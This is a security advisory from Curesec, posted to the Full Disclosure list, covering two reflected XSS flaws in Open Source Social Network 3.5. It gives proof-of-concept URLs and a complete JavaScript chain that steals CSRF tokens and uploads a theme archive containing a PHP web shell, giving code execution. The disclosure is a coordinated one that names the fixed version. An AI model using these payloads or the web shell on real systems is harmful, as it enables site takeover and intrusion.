Security Advisory - Curesec Research Team 1. Introduction
Affected Open Source Social Network 3.5 Product: Fixed in: 3.6 Fixed Version https://www.opensource-socialnetwork.org/downloads/ Link: ossn-v3.6-1443545762.zip Vendor Contact: https://www.opensource-socialnetwork.org/contact Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 11/13/2015 public: Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in Open Source Social Network 3.5. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ossn/search?q='"></script><script>alert(1)</script> Code /ossn/themes/default/plugins/menus/search.php $menus = $params['menu']; echo "<div class='ossn-menu-search'>"; echo '<div class="title">' . ossn_print('result:type') . '</pre>'; foreach ($menus as $menu => $val) { foreach ($val as $link) { $menu = str_replace(':', '-', $link['text']); $icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png"; $text = ossn_print($link['text']); $link = $link['href']; echo "<li><a href='{$link}'> <img src='{$icon}' /> <div class='text'>{$text}</pre> </a> </li>"; } } echo '</pre>'; 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ossn/home?offset=2&foo='"></script><script>alert(1)</script> Code /ossn/themes/default/pagination/view.php if (count($_GET)) { $args_url = ''; foreach ($_GET as $key => $value) { if ($key != 'page') { $args_url .= '&' . $key . '=' . $value; } } } [...] $url = "?offset={$first}{$args_url}"; echo "<li><a href='{$url}' class='ossn-pagination-page'>".ossn_print('ossn:pagination:first')."</a></li>"; 5. XSS to Code Execution Description Because the backend allows the upload of PHP files, the XSS vulnerabilities can lead to code execution. Proof of Concept http://localhost/ossn/search?q='"><script src=http://localhost/s.js></script> /s.js: var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer'; var html = get(csrfProtectedPage); document.body.innerHTML = html; var token = document.getElementsByName("ossn_token")[0].value; var timestamp = document.getElementsByName("ossn_ts")[0].value; submitRequest(token, timestamp); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } function submitRequest(token, timestamp) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/ossn/action/admin/theme_install", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1441530840601255132539565608"); xhr.withCredentials = true; var body = "-----------------------------1441530840601255132539565608\r\n" + "Content-Disposition: form-data; name=\"ossn_ts\"\r\n" + "\r\n" + "" + timestamp + "\r\n" + "-----------------------------1441530840601255132539565608\r\n" + "Content-Disposition: form-data; name=\"ossn_token\"\r\n" + "\r\n" + "" + token + "\r\n" + "-----------------------------1441530840601255132539565608\r\n" + "Content-Disposition: form-data; name=\"theme_file\"; filename=\"mycustomtheme.zip\"\r\n" + "Content-Type: application/x-zip-compressed\r\n" + "\r\n" + "PK\x03\x04\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00mycustomtheme/PK\x03\x04\n" + "\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00mycustomtheme/404.php\x3c?php passthru($_GET[\'x\']);\n" + "PK\x03\x04\n" + "\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x03\x04\n" + "\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00mycustomtheme/PK\x01\x02?\x03\n" + "\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81,\x00\x00\x00mycustomtheme/404.phpPK\x01\x02?\x03\n" + "\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81{\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x01\x02?\x03\n" + "\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81\xb5\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x13\x01\x00\x00\xef\x00\x00\x00\x00\x00\r\n" + "-----------------------------1441530840601255132539565608--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } 6. Solution To mitigate this issue please upgrade at least to version 3.6: https://www.opensource-socialnetwork.org/downloads/ossn-v3.6-1443545762.zip Please note that a newer version might already be available. 7. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Open-Source-Social-Network-35-XSS-92.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/